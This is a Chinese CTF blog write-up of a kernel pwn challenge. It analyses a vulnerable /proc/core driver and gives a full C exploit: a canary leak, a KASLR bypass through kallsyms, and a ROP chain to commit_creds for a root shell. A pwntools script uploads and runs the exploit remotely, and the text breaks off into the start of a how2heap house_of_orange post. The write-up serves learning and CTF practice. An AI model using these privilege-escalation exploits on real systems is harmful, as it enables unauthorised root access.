<p><code>cpio -idmv &lt; core.cpio</code>解包的时候就发现有点问题，所以我就用图形化界面的解包工具把cpio解包了之后再用<code>find . | cpio -o --format=newc &gt; ./root.cpio</code>，把它重新打包了一下</p>
<p>接着发现还是起不起来，找了师<a href="http://eternalsakura13.com/2018/03/31/b_core/" target="_blank" rel="noopener">傅们的博客</a>，就又把上面<code>.sh</code>中的 -m 64改成了 -m 128</p>
<p>还是起不来（跪，报错：Kernel panic - not syncing: Out of memory and no killable processes…</p>
<p>本来以为是自己虚拟机的问题，先跑过去激活了之前忘记激活的swap分区…然后各种操作，最后….</p>
<p>找了半天原因，…..发现原来是师傅们的128也不行，改成 -m 256M跑起来了，也差不多懂了 qemu 的-m到底是干嘛的……</p>
<h2 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h2><p>啊….总算可以开始正式写题了</p>
<p>这里记一下一般kernel pwn的步骤吧，就照着师傅们写的来</p>
<h3 id="第一步"><a href="#第一步" class="headerlink" title="第一步"></a>第一步</h3><p><strong>先看init函数和fop结构体</strong></p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584974897309.png" alt="1584974897309"></p>
<p>可见驱动文件创建于proc下的core文件，在我们的用户程序中对ioctl等驱动函数的访问就是通过core文件来进行的</p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584974842581.png" alt="1584974842581"></p>
<p>可以看到fop回调中只实现了如图三个回调，因此，虽然ida左侧的函数列表中还有core_read、core_copy_func但是这俩是驱动内部的函数，是不能由用户程序来调用的</p>
<h3 id="ioctl"><a href="#ioctl" class="headerlink" title="ioctl"></a>ioctl</h3><p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584974968510.png" alt="1584974968510"></p>
<p>根据请求码执行相应的函数</p>
<h3 id="core-read"><a href="#core-read" class="headerlink" title="core_read"></a>core_read</h3><p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584975417499.png" alt="1584975417499"></p>
<p>这里的意思大概就是打印了off还有ioctl第三个参数的值</p>
<p>然后进行了一个类似memset的操作，接着从栈buffer的off偏移位置开始拷贝给用户64字节的数据</p>
<p>显然off如果可控的话就leak了canary或者其他一些东西</p>
<p>然而off在我们传入的控制码为<code>0x6677889C</code>时，就可以直接赋值为ioctl的第三个参数</p>
<h3 id="core-copy-func"><a href="#core-copy-func" class="headerlink" title="core_copy_func"></a>core_copy_func</h3><p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584975853772.png" alt="1584975853772"></p>
<p>这个函数的意思就是ioctl的第三个参数如果大于0x3F时，就会detect到溢出然后直接返回，否则直接从name全局变量中拷入p3个字节的数据到v3这个栈buffer中，但是在memcpy时p3被转换成了unsigned __int16，所以我们在p3为负数时可以实现一个比较大的overflow</p>
<h3 id="core-write"><a href="#core-write" class="headerlink" title="core_write"></a>core_write</h3><p>再来看注册过的write函数</p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584976661640.png" alt="1584976661640"></p>
<p>user的buffer就是通过这个函数传给name，不过这里看不到v5的赋值</p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584976821281.png" alt="1584976821281"></p>
<p>在汇编里面可以看到这个赋值是通过rsi来进行的</p>
<p>所以流程就是这样：</p>
<ol>
<li>设置off值 </li>
<li>泄露canary</li>
<li>把rop链写进name变量</li>
<li>利用无符号整型漏洞进行栈溢出写rop链</li>
</ol>
<h3 id="ret2user-amp-exp"><a href="#ret2user-amp-exp" class="headerlink" title="ret2user&amp;exp"></a>ret2user&amp;exp</h3><p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584977702149.png" alt="1584977702149"></p>
<p>注意init脚本中拷贝了一份内核函数表到<code>/tmp/kallsyms</code>,可以供我们直接读到内核函数地址，此时读到的符号在开启kaslr下就是读到的kaslr后的地址，可以减去没有开kaslr时的偏移</p>
<p>对于kernel pwn的exp的话先看别人是怎么写的吧，然后自己再慢慢学着写，模板肯定都是差不多的</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">save_status</span><span class="params">()</span></span>;<span class="comment">//保存用户状态时寄存器</span></span><br><span class="line"><span class="keyword">size_t</span> find_symbols();<span class="comment">//查看/tmp/kallsyms找到kaslr下函数的地址</span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">getpwn</span><span class="params">()</span></span>;<span class="comment">//跑/bin/sh</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">core_copy_func</span><span class="params">(<span class="keyword">int</span> fd,<span class="keyword">long</span> <span class="keyword">long</span> <span class="keyword">int</span> <span class="built_in">size</span>)</span></span>;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">core_read</span><span class="params">(<span class="keyword">int</span> fd,<span class="keyword">char</span>* buf)</span></span>;<span class="comment">//这两个就是通过ioctl的操作码来和驱动设备交互了</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">size_t</span> vmlinux_base = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">size_t</span> commit_creds = <span class="number">0</span>, prepare_kernel_cred = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">size_t</span> raw_vmlinux_base = <span class="number">0xffffffff81000000</span>;</span><br><span class="line"><span class="keyword">size_t</span> user_cs, user_ss, user_rflags, user_sp;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123; </span><br><span class="line">   save_status();</span><br><span class="line">   <span class="keyword">int</span> fd = <span class="built_in">open</span>(<span class="string">"/proc/core"</span>, <span class="number">2</span>);</span><br><span class="line">   <span class="keyword">if</span>(fd&lt;<span class="number">0</span>)</span><br><span class="line">   &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"[*] open /proc/core error"</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">   &#125;</span><br><span class="line">   find_symbols();</span><br><span class="line">   <span class="keyword">size_t</span> offset=vmlinux_base-raw_vmlinux_base;<span class="comment">//raw_vmlinux_base是我们没有开启kaslr时的内核加载基址，这里就是算出aslr的offset</span></span><br><span class="line">   setoff(fd,<span class="number">0x40</span>);<span class="comment">//将off的值 设置成canary对应的偏移</span></span><br><span class="line">   <span class="keyword">char</span> buf[<span class="number">0x40</span>]=&#123;<span class="number">0</span>&#125;;</span><br><span class="line">   core_read(fd,buf);<span class="comment">//把canary读到这个buf数组里面去</span></span><br><span class="line"></span><br><span class="line">   <span class="keyword">size_t</span> canary=((<span class="keyword">size_t</span> *)buf)[<span class="number">0</span>];</span><br><span class="line">   <span class="built_in">printf</span>(<span class="string">"[*] canary :%p\n"</span>, canary);</span><br><span class="line">   <span class="keyword">size_t</span> rop[<span class="number">0x1000</span>];</span><br><span class="line">   <span class="keyword">int</span> i;</span><br><span class="line">   <span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="number">10</span>;i++)</span><br><span class="line">   &#123;</span><br><span class="line">    rop[i]=canary;</span><br><span class="line">   &#125;</span><br><span class="line">    rop[i++] = <span class="number">0xffffffff81000b2f</span> + offset; <span class="comment">// pop rdi; ret</span></span><br><span class="line">    rop[i++] = <span class="number">0</span>;</span><br><span class="line">    rop[i++] = prepare_kernel_cred;         <span class="comment">// prepare_kernel_cred(0)</span></span><br><span class="line"></span><br><span class="line">    rop[i++] = <span class="number">0xffffffff810a0f49</span> + offset; <span class="comment">// pop rdx; ret   </span></span><br><span class="line">    rop[i++] = <span class="number">0xffffffff81021e53</span> + offset; <span class="comment">// pop rcx; ret   rdx=&amp;'pop rcx; ret'</span></span><br><span class="line">    rop[i++] = <span class="number">0xffffffff8101aa6a</span> + offset; <span class="comment">// mov rdi, rax; call rdx; prepare_kernel_cred(0)返回值放到rdi</span></span><br><span class="line">                                            <span class="comment">//call rdx:pop rcx 把call保存的rip放到rcx去，这一步没什么意义只是为了直接ret到下一条</span></span><br><span class="line">    rop[i++] = commit_creds;<span class="comment">//执行commit_creds(rdi)</span></span><br><span class="line"></span><br><span class="line">    rop[i++] = <span class="number">0xffffffff81a012da</span> + offset; <span class="comment">// swapgs; popfq; ret </span></span><br><span class="line">    rop[i++] = <span class="number">0</span>;<span class="comment">//为了gadget中的popfq</span></span><br><span class="line"></span><br><span class="line">    rop[i++] = <span class="number">0xffffffff81050ac2</span> + offset; <span class="comment">// iretq; ret; 此时之前保存的用户态数据就有作用了</span></span><br><span class="line">    rop[i++] = (<span class="keyword">size_t</span> )getpwn;</span><br><span class="line">    rop[i++] = user_cs;</span><br><span class="line">    rop[i++] = user_rflags;</span><br><span class="line">    rop[i++] = user_sp;</span><br><span class="line">    rop[i++] = user_ss;</span><br><span class="line">    <span class="built_in">write</span>(fd,rop,<span class="number">0x800</span>);<span class="comment">//先用write写到name中，因为此设备的write是注册过的，所以可以直接用write写进去</span></span><br><span class="line">    core_copy_func(fd,<span class="number">0xffffffffffff0000</span> | (<span class="number">0x100</span>));<span class="comment">//然后开始core_copy实现栈溢出</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">   <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">core_copy_func</span><span class="params">(<span class="keyword">int</span> fd,<span class="keyword">long</span> <span class="keyword">long</span> <span class="keyword">int</span> <span class="built_in">size</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"[*] going core_copy_func"</span>);</span><br><span class="line">    ioctl(fd,<span class="number">0x6677889A</span>,<span class="built_in">size</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">getpwn</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123; </span><br><span class="line">   <span class="keyword">if</span>(!getuid())</span><br><span class="line">   &#123;</span><br><span class="line">      system(<span class="string">"/bin/sh"</span>);</span><br><span class="line"></span><br><span class="line">   &#125;</span><br><span class="line">   <span class="keyword">else</span></span><br><span class="line">   &#123;</span><br><span class="line">     <span class="built_in">puts</span>(<span class="string">"[*] get shell error"</span>);</span><br><span class="line">   &#125;</span><br><span class="line">   <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">core_read</span><span class="params">(<span class="keyword">int</span> fd,<span class="keyword">char</span>* buf)</span></span></span><br><span class="line"><span class="function"></span>&#123; </span><br><span class="line">     <span class="built_in">puts</span>(<span class="string">"[*] going core_read"</span>);</span><br><span class="line">     ioctl(fd,<span class="number">0x6677889B</span>,buf);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">setoff</span><span class="params">(<span class="keyword">int</span> fd,<span class="keyword">int</span> <span class="built_in">size</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">"[*] going setoff"</span>);</span><br><span class="line">      ioctl(fd,<span class="number">0x6677889C</span>,<span class="built_in">size</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">save_status</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    __asm__(<span class="string">"mov user_cs, cs;"</span></span><br><span class="line">            <span class="string">"mov user_ss, ss;"</span></span><br><span class="line">            <span class="string">"mov user_sp, rsp;"</span></span><br><span class="line">            <span class="string">"pushf;"</span></span><br><span class="line">            <span class="string">"pop user_rflags;"</span></span><br><span class="line">            );</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"[*]status has been saved."</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">size_t</span> find_symbols()</span><br><span class="line">&#123;</span><br><span class="line">    FILE* kallsyms_fd = fopen(<span class="string">"/tmp/kallsyms"</span>, <span class="string">"r"</span>);</span><br><span class="line">    <span class="comment">/* FILE* kallsyms_fd = fopen("./test_kallsyms", "r"); */</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(kallsyms_fd &lt; <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">"[*]open kallsyms error!"</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">char</span> buf[<span class="number">0x30</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">    <span class="keyword">while</span>(fgets(buf, <span class="number">0x30</span>, kallsyms_fd))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span>(commit_creds &amp; prepare_kernel_cred)</span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="built_in">strstr</span>(buf, <span class="string">"commit_creds"</span>) &amp;&amp; !commit_creds)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">char</span> hex[<span class="number">20</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">            <span class="built_in">strncpy</span>(hex, buf, <span class="number">16</span>);</span><br><span class="line">            <span class="built_in">sscanf</span>(hex, <span class="string">"%llx"</span>, &amp;commit_creds);</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">"commit_creds addr: %p\n"</span>, commit_creds);</span><br><span class="line">            vmlinux_base = commit_creds - <span class="number">0x9c8e0</span>;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">"vmlinux_base addr: %p\n"</span>, vmlinux_base);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="built_in">strstr</span>(buf, <span class="string">"prepare_kernel_cred"</span>) &amp;&amp; !prepare_kernel_cred)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">/* puts(buf); */</span></span><br><span class="line">            <span class="keyword">char</span> hex[<span class="number">20</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">            <span class="built_in">strncpy</span>(hex, buf, <span class="number">16</span>);</span><br><span class="line">            <span class="built_in">sscanf</span>(hex, <span class="string">"%llx"</span>, &amp;prepare_kernel_cred);</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">"prepare_kernel_cred addr: %p\n"</span>, prepare_kernel_cred);</span><br><span class="line">            vmlinux_base = prepare_kernel_cred - <span class="number">0x9cce0</span>;</span><br><span class="line">            <span class="comment">/* printf("vmlinux_base addr: %p\n", vmlinux_base); */</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(!(prepare_kernel_cred &amp; commit_creds))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">"[*]Error!"</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="调试过程"><a href="#调试过程" class="headerlink" title="调试过程"></a>调试过程</h2><p>现在有了exp还有思路当然要自己调试的看一看了，具体调试我使用的是pwndgb</p>
<p>先把编译好的exp打包进root.cpio中（解包打包操作前面有了）(编译命令是师傅教我的<code>musl-gcc  -static -O2 exp.c -o exp</code>)</p>
<p>然后用./rootstart把qemu起起来，执行 <code>gdb vmlinux</code></p>
<p>接着<code>set architecture i386:x86-64</code>，<code>target remote:1234</code></p>
<p>这里我调试的时候第一次断在了<code>0xffffffffc00000cc</code>，地址是通过root模式下lsmod显示的驱动base加上IDA中偏移后得来的，所以感觉nokaslr下调试会方便一些（有kaslr时感觉断点都不太好下），断的地方就是在<code>core_read</code>中copy_to_user处</p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1585008529686.png" alt="1585008529686"></p>
<p>断下来了之后是这样的</p>
<p>栈上的情况大致如下：</p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1585008988570.png" alt="1585008988570"></p>
<p>这里分别是canary、ebp（这个ebp似乎直接返回到用户栈去了）、返回地址（对应我们驱动中ioctl的地址）</p>
<p>copy_to_user之后就可以获得8*8个栈上的数据，当然就包括canary还有一些地址了</p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1585009204137.png" alt="1585009204137"></p>
<p>然后从内核态返回用户态似乎是从<code>__do_softirq+328</code>这里返回的</p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1585009743004.png" alt="1585009743004"></p>
<p>最后断在qmemcpy之后（中间的感觉不用断了…挺好理解的），可以看到栈上的数据已经被改成了各种gadget还有返回时需要的寄存器值</p>
<p>调试的时候<code>log_buf_vmcoreinfo_setup+209</code>好像就是执行<code>prepare_kernel_cred(0)</code></p>
<p><code>msg_print_ext_body+227</code>就是执行<code>commit_creds(rdi)</code></p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1585010675845.png" alt="1585010675845"></p>
<p>最后执行到最后ret之前就是这样了，返回用户态执行<code>/bin/sh</code>（那个0x400430就是我们的getpwn），就是从ring0直接调用，所以弹给我们的就是root的shell了</p>
<p>至于这个程序的kaslr没有特意去绕是因为我们直接读取了<code>/tmp/kallsyms</code>，从而减去没有kaslr时的内核函数基地址就可以得到加载偏移，不过内核函数加载地址和我们驱动加载地址似乎是被kaslr映射在不同的地方的，需要的情况下得分别leak才行（比如我们上面read时leak了很多内容）</p>
<p>我们这个程序也刚好没有使用到驱动的gadget，所以只用leak内核函数基址就好了</p>
<p><code>./start</code>脚本去实测的效果就是这样：</p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1585011340948.png" alt="1585011340948"></p>
<p>ps：这个kaslr似乎后很多位的off都是相同的</p>
<p>这里再给出一个CTF比赛时打远程的脚本（来自林国鹏师傅）：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! /usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="comment"># vim:fenc=utf-8</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># Copyright © 2019 saltedfish &lt;17302010022@fudan.edu.cn&gt;</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># Distributed under terms of the MIT license.</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">cmd = <span class="string">'$ '</span></span><br><span class="line"></span><br><span class="line">p=remote(<span class="string">'192.168.3.255'</span>,<span class="number">1234</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">exploit</span><span class="params">(r)</span>:</span></span><br><span class="line">    r.sendlineafter(cmd, <span class="string">'stty -echo'</span>)</span><br><span class="line">    os.system(<span class="string">'musl-gcc  -static -O2 exp.c -o exp'</span>)</span><br><span class="line">    os.system(<span class="string">'gzip -c exp &gt; exp.gz'</span>)</span><br><span class="line">    r.sendlineafter(cmd, <span class="string">'cat &lt;&lt;EOF &gt; exp.gz.b64'</span>) <span class="comment">#heredoc</span></span><br><span class="line">    r.sendline((read(<span class="string">'exp.gz'</span>)).encode(<span class="string">'base64'</span>))</span><br><span class="line">    r.sendline(<span class="string">'EOF'</span>)</span><br><span class="line">    r.sendlineafter(cmd, <span class="string">'base64 -d exp.gz.b64 &gt; exp.gz'</span>)</span><br><span class="line">    r.sendlineafter(cmd, <span class="string">'gunzip exp.gz'</span>)</span><br><span class="line">    r.sendlineafter(cmd, <span class="string">'chmod +x ./exp'</span>)</span><br><span class="line">    r.sendlineafter(cmd, <span class="string">'./exp'</span>)</span><br><span class="line">    r.interactive()</span><br><span class="line"></span><br><span class="line">exploit(r)</span><br></pre></td></tr></table></figure>






      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

        
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block home" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/15/how2heap-house-of-orange-houseoforange/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Coldshield">
      <meta itemprop="description" content="分享一些bin学习日常">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshield's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
            <a href="/2020/03/15/how2heap-house-of-orange-houseoforange/" class="post-title-link" itemprop="url">how2heap - house_of_orange&houseoforange</a>
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2020-03-15 03:05:12 / Modified: 18:06:01" itemprop="dateCreated datePublished" datetime="2020-03-15T03:05:12+08:00">2020-03-15</time>
            </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2020/03/15/how2heap-house-of-orange-houseoforange/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/03/15/how2heap-house-of-orange-houseoforange/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="how2heap-house-of-orange-amp-houseoforange"><a href="#how2heap-house-of-orange-amp-houseoforange" class="headerlink" title="how2heap - house_of_orange&amp;houseoforange"></a>how2heap - house_of_orange&amp;houseoforange</h1><p>ubuntu16.04   libc2.23</p>
<h1 id="house-of-orange-c"><a href="#house-of-orange-c" class="headerlink" title="house_of_orange.c"></a>house_of_orange.c</h1><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">winner</span> <span class="params">( <span class="keyword">char</span> *ptr)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> *p1, *p2;</span><br><span class="line">    <span class="keyword">size_t</span> io_list_all, *top;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    p1 = <span class="built_in">malloc</span>(<span class="number">0x400</span><span class="number">-0x10</span>);<span class="comment">//malloc一个small chunk (size:0x400)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    top = (<span class="keyword">size_t</span> *) ( (<span class="keyword">char</span> *) p1 - <span class="number">16</span> + <span class="number">0x400</span>);<span 